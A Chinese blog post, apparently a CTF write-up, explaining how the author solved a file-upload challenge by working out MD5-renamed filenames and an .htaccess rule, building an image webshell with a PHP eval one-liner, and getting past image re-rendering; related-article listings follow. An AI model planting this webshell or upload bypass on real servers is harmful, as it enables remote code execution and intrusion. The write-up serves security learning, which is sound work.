时隔四天,终于把这道文件上传漏洞题做出来了。

已于 2022-04-27 21:56:30 修改
阅读量2k 收藏
点赞数
文章标签: php web安全
于 2022-04-27 21:53:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qz362228/article/details/124460887
版权
本文详细介绍了如何通过分析文件上传和重命名机制,利用PHP的一句话木马绕过系统限制,最终成功访问到flag.php文件并获取FLAG。过程中涉及到.htaccess文件、文件名加密解密、图片马的制作以及应对二次渲染的解决策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里附上各种一句话木马大全

先看题:
在这里插入图片描述
说明了文件保存路径./upload。点击展示发现有.htaccess文件,还有一个flag.php文件
在这里插入图片描述
在文本框中输入.htaccess,点击预览,出现下面这句话。但输入flag.php
,会弹框说不能直接操作flag文件。看下面这句话我们可以知道:在./upload目录下,文件名为098f6bcd4621d373cade4e832627b4f6.gif的文件可以php代码解析出来。所以可以想到要上传一个图片马,而且文件名为098f6bcd4621d373cade4e832627b4f6.gif
在这里插入图片描述
但看下图,若我们随便上传一个图片,文件名都会被改变。这里我上传了2.gif文件
在这里插入图片描述
所以要思考怎样才能让上传后的文件名能为098f6bcd4621d373cade4e832627b4f6.gif。于是我想到看看直接输入下面这个url会怎样

http://120.79.135.77:10002/range/upload/flag.php

结果出现了这一幕,既然它出现了就一定是有问题的(然而我一开始发现的时候却并没有在意它),然后随便点开看了一下,就知道了是用MD5加密使文件名改变的。
在这里插入图片描述
然后将098f6bcd4621d373cade4e832627b4f6解密得是test。也就是说我们只要将文件名为test.gif的文件上传,就能被保存为098f6bcd4621d373cade4e832627b4f6.gif
在这里插入图片描述
然后我们开始制作图片马。在shell.php文件中写入下面这个一句话木马,然后在命令行输入copy 2.gif /b + shell.php /a test.gif2.gif是一个普通图片,得到的test.gif就是我们要的图片马了

<? @eval($_REQUEST[x]);?>

然后将test.gif上传,下载后的图片用010 Editor打开却发现php代码不见了,这时就想到是二次渲染,那就将原图和下载的图片比较,然后在相同部分插入一句话木马。
【就是做这一步花了我好久时间,我知道是二次渲染,试了好多次插入一句话木马,但保存后的图片的马还是不见了,直到今天,在最前面的蓝色部分(相同部分)插入马,终于成功—多尝试,细节细节细节!!】
在这里插入图片描述
在蚁剑中连接得到flag
在这里插入图片描述
在这里插入图片描述

乔治777
关注
从苏宁电器到卡巴斯基(第二部)第09篇:我在卡巴的日子 IX
Gleam的专栏
04-02 452
目录 还愿吾爱破解视频教程大赛 选 备课与提交课程 改名 说说参赛视频里面的声音和我的对手们 我的对手们 结果出炉 最后 还愿吾爱破解视频教程大赛 我在第一部小说里面曾经提到过,第四届的吾爱破解视频教程比赛是在2015年的年初举办的,当时不小心错过之后,就想参加2016年的比赛。因为尽管那次比赛我没有参加,但是却极大地改变了我之后的人生走向,因此也是发生了不少的故事。而这次我是铁了心要参赛的,但是年初过去了,年中也过去了,吾爱论坛始终没有要举办赛事的消息,一度觉得今年就不会举办了,觉得
LVS的DR模式(ldirectord的使用,keepalived配置高可用集群)
dreamer_hahaha
07-30 6691
Lvs - DR LVS-DR模型的特性: 保证前端路由将目标地址为VIP报文统统发给Director Server,而不是RS RS可以使用私有地址;也可以是公网地址,如果使用公网地址,此时可以通过互联网对RIP进行直接访问 RS跟Director Server必须在同一个物理网络中 所有的请求报文经由Director Server,但响应报文必须不能进过Director Server...
文件上传漏洞
ivan0609的专栏
03-22 2443
在上网的过程中,我们经常会将一些如图片、压缩包之类的文件上传到远端服务器进行保存。文件上传攻击指的是恶意攻击者利用一些站点没有对文件的类型做很好的校验,上传了可执行的文件或者脚本,并且通过脚本获得服务器上相应的权利,或者通过诱导外部用户访问、下载上传的病毒或木马文件,达到攻击的目的。 为了防范用户上传恶意的可执行的文件和脚本,以及将文件上传服务器当作免费的文件存储服务器使用,我们需要对上传文件类
记一次简单的文件上传漏洞
m0_62670778的博客
08-28 511
简单的文件上传漏洞
文件上传漏洞(upload_labs)
weixin_55773382的博客
01-09 2256
Pass-01 查看页面源码,果然在前端进行了限制。 前端代码 把准备好的php文件后缀改为.jpg,这样就能绕过前端的检测。 修改后的文件 然后上传的时候使用burp suite拦截,并把文件后缀改回.php,成功上传php文件。 成功上传 pass-02 根据目上传的要求是图片,猜测一下服务器校验content-typ在这里插入图片描述 pass 3 1,根据提示:这是黑名单绕过 2,前提是apachae的conf中有以下配置 AddType application/x-httpd-php
【CTF-Web文件上传漏洞学习笔记(ctfshow目)
jayq1的博客
06-03 6753
文件上传漏洞学习笔记,ctfshow目为依托
文件上传漏洞练习 upload-labs(11~15)【双写绕过,get%00截断绕过,post 00截断绕过,图片马上传及绕过】
bin789456的博客
08-24 981
写在前面 下面几目与php源码有关,如果你对php并不是很熟悉,或者看起来较为吃力,可以点击下方 源码分析链接 会有基础知识准备,同时在pass-03中有源码分析和对各个函数的讲解。 Pass-11 这里点开源码都不一样了,不再是之前的去点,转小写,去特殊字符等等函数。 来看看吧: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $den
最新八股文面试
weixin_44530708的博客
03-01 2841
最新八股文面试
2022 Java面试
热门推荐
qq_44785726的博客
02-18 1万+
Java面向对象有哪些特征,如何应用 ​ 面向对象编程是利用类和对象编程的一种思想。万物可归类,类是对于世界事物的高度抽象 ,不同的事物之间有不同的关系 ,一个类自身与外界的封装关系,一个父类和子类的继承关系, 一个类和多个类的多态关系。万物皆对象,对象是具体的世界事物,面向对象的三大特征封装,继承,多态。封装,封装说明一个类行为和属性与其他类的关系,低耦合,高内聚;继承是父类和子类的关系,多态说的是类与类的关系。 ​ 封装隐藏了类的内部实现机制,可以在不影响使用的情况下改变类的内部结构,同时也保护了数
python高级—— 从趟过的坑中聊聊爬虫、反爬、反反爬,附送一套高级爬虫试
09-30 6946
前言: 时隔数月,我终于又更新博客了,然而,在这期间的粉丝数也就跟着我停更博客而涨停了,唉 是的,我改了博客名,不知为什么要改,就感觉现在这个名字看起来要洋气一点。 那么最近到底咋不更新博客了呢?说起原因那就多了,最主要的还是没时间了,是真的没时间,前面的那些系列博客都还没填坑完毕的(后续都会填上的) 最近有点空余就一直在开发我的项目,最近做了两个项目: IPproxy,看名字就知啦...
文件上传漏洞原理与实践练习
weixin_54217081的博客
12-13 1372
一.单选 1.IIS默认的Web目录是( C ) A.C:\phpStudy\PHPTutorial\WWW B.C:\xampp\htdocs C.C:\Inetpub\wwwroot D./var/www/html
文件上传漏洞学习——upload-labs 闯关(一)
未完成的歌~的博客
08-08 3396
Less 1—10 写的很详细!╰( ̄ω ̄o) 后面的会继续更新。
文件上传漏洞解析与upload库讲解
zl52111的博客
04-13 688
一:前端检测 1.在前端文件上传时直接进行检测 例如直接检测后缀名 解决方法: 可以直接在页面中删除上传时所触发的事件 可以使用but进行抓包处理 修改文件后缀名 2.服务器端防御 (content-type类型)(例如14) MIME类型(描述消息类型的因特网标准) 常见的MIME举例 当需要读取图片大小时 (这时后缀名和类型都没用) 可以使用图片方法
WebShell文件上传漏洞分析溯源(第2)
jeehoon的博客
11-13 252
在我打开burpsuite忘记关的时候,我上传了一个.txt文件,发现它还是警告我不能上传,说明这目在前端就做了限制,那么我们只需要用burpsuite绕过前端,改包就可以上传一句话木马,先上传一个符合格式的文件 此处改成php文件 成功返回地址uploads/test.php,然后打开菜刀连接,找到key ...
文件上传漏洞知识总结
二狗的博客
03-08 540
国光有一台 XPS15 里面运行着 macOS 和 Ubuntu 双系统,其中 XPS 主要系统就是 Ubuntu,国光在 Ubuntu里面搭建了一个离线的 CTFd 里面还运行着 Docker、宝塔。基本上很多服务都可以在我的 XPS 上运行起来了,出去讲课的时候会带着我的 XPS 和MBP 一起,离线靶场一开美滋滋,更关键的是往自己的靶场里面填充目有一种养成游戏的感觉,很有成就感。
文件类漏洞面试
m0_61990875的博客
11-08 564
文件类面试
文件上传及相关例
2401_82388450的博客
04-13 1246
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问,有问的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
Linux下对字符串进行MD5加密
weixin_34273479的博客
05-24 470
Linux下对字符串进行MD5加密  比如要用MD5在linux下加密字符串“test",可以使用命令:$ echo -n test|md5sum098f6bcd4621d373cade4e832627b4f6  -或$ echo -n test|openssl md5(stdin)= 098f6bcd4621d373cade4e832627b4f6但不要用把字符串写到文本里,然...
CG CTF 上传绕过
qq_46389295的博客
02-23 550
目链接 上传jpg文件显示 Array ( [0] => .jpg [1] => jpg ) Upload: 1.jpg Type: image/jpeg Size: 0.0263671875 Kb Stored in: ./uploads/8a9e5f6a7a789acb.phparray(4) { ["dirname"]=> string(9) "./uploads" ["...
如果我有一组28天,每天时隔15分钟的96个数据点,这一组数据,应该编写的matlab程序去处理数据
最新发布
11-20
如果你有一组每天间隔15分钟的连续28天的数据,你可以按照以下步骤编写MATLAB程序来处理: 1. **数据导入**: 使用`readmatrix`或`readtable`函数读取存储数据的CSV或其他文件。假设数据在CSV文件中,名为'daily_data.csv',可以用下面的代码: ```matlab data = readmatrix('daily_data.csv'); ``` 2. **数据结构转换**: 确保数据按时间顺序排列,并将其转换成更便于处理的结构,比如一个多维矩阵或者 timetable。例如,可以使用`datetime`函数建立日期索引: ```matlab dates = datetime(1:size(data,1), 'Format', 'dd-Mon-yyyy HH:mm'); % 根据实际格式调整 daily_data = table(dates, data); ``` 3. **数据采样**: 如果你想得到每小时的数据,你可以对每个时间窗口内的数据求平均。例如,用`repmat`和`reshape`合并时间间隔: ```matlab hourly_data = reshape(mean([daily_data{:,2:end}(:,repmat(1:96,1,28))], [], 2), [], 96); % 每小时的平均值 ``` 4. **可视化**: 可以使用`plot`或`line`绘制数据,观察趋势: ```matlab plot(hourly_data) title('Hourly Data for 28 Days') xlabel('Time (hours)') ylabel('Data Points') ``` 5. **分析或进一步处理**: 根据需要,可以进行滚动窗口统计(如滑动平均)、异常检测或者创建模型(如ARIMA或机器学习模型)来进行数据分析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值